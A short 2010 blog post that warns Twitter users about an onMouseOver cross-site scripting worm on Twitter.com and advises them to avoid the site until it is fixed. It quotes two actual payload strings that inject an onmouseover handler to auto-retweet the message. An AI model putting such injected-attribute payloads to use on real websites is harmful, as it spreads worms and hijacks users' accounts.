Tuesday, September 21, 2010

Twitter under attack, stop using Twitter.com until the problem is fixed.

If you're an user of Twitter, you probably observed today that many of the persons you follow are tweeting strange things. The idea is that there's an exploit in Twitter.com responsible for that. More exactly, the website fails to disallow the "onMouseOver" JavaScript command, which means that if you move the mouse over the offending tweet, you'll automatically retweet that tweet or you will be redirected to another website.

This is how a message like that looks like (DO NOT click on that links!!):
http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/
or another one:
http://t.co/@"onmouseover="document.getElementById('status').value='RT Unlevin ';$('.status-update-form').submit();"class="modal-overlay"/
It seems that most third party clients aren't affected by the exploit. Stop using Twitter's official website for now, as the strange messages are still coming in. Anyway, DO NOT click on the websites that tweets are linking to, they can possibly try to insert malicious code in your computer.

Twitter didn't announce anything about this until now, but they'll surely notify users when Twitter.com is safe, so follow status.twitter.com for latest news.

No comments:

Post a Comment